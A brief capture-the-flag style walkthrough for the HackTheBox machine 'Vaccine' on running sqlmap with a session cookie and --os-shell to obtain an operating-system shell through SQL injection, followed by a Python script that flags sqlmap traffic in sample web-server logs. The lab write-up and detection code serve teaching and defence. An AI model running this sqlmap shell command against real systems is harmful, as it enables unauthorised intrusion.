Basics - How to use sqlmap

sqlmap is used in the HTB machine Vaccine

First, let's look at the help output using

sqlmap -h

This will help us structure our sqlmap query

1. We need to provide the target url


2. We need to provide the PHPSESSID


3. We need to add --os-shell, which tells sqlmap to prompt for an interactive operating system shell

With all that info we can now construct our query as follows:

sqlmap --url="" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different from mine

You will now be prompted to enter Y or N a couple of times. Just press Enter for all of them to accept the defaults.

We got the shell!
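What a run like this leaves in the web server's access log, as an added example that is not part of the original walkthrough: the script flags clients that send sqlmap's default User-Agent and, because the client can change that header, also clients that request one path with many distinct query strings. The log lines, the path /app.php, the addresses and the threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed access-log lines in "combined" format (not taken from the page).
SAMPLE_LOG = '''\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /app.php?q=probe-01 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /app.php?q=probe-02 HTTP/1.1" 500 128 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.0.2.20 - - [01/Jan/2024:10:05:00 +0000] "GET /app.php?q=probe-03 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.20 - - [01/Jan/2024:10:05:00 +0000] "GET /app.php?q=probe-04 HTTP/1.1" 500 128 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.20 - - [01/Jan/2024:10:05:01 +0000] "GET /app.php?q=probe-05 HTTP/1.1" 500 128 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.20 - - [01/Jan/2024:10:05:01 +0000] "GET /app.php?q=probe-06 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.5 - - [01/Jan/2024:10:07:12 +0000] "GET /app.php?q=shoes HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.5 - - [01/Jan/2024:10:07:30 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# sqlmap identifies itself as "sqlmap/<version>..." unless the header is overridden.
SQLMAP_UA = re.compile(r'^sqlmap/', re.IGNORECASE)


def analyze(log_text, distinct_threshold=3):
    """Return clients using the default sqlmap UA and (ip, path) pairs
    that were requested with at least `distinct_threshold` query strings."""
    ua_clients = set()
    variants = defaultdict(set)  # (ip, path) -> distinct query strings seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        path, _, query = m["target"].partition("?")
        if SQLMAP_UA.match(m["ua"]):
            ua_clients.add(m["ip"])
        if query:
            variants[(m["ip"], path)].add(query)
    many = {k: len(v) for k, v in variants.items() if len(v) >= distinct_threshold}
    return {"default_ua_clients": sorted(ua_clients), "many_variants": many}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

The threshold of 3 only suits this small sample; on real traffic it has to be tuned against how many distinct searches a normal user makes.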

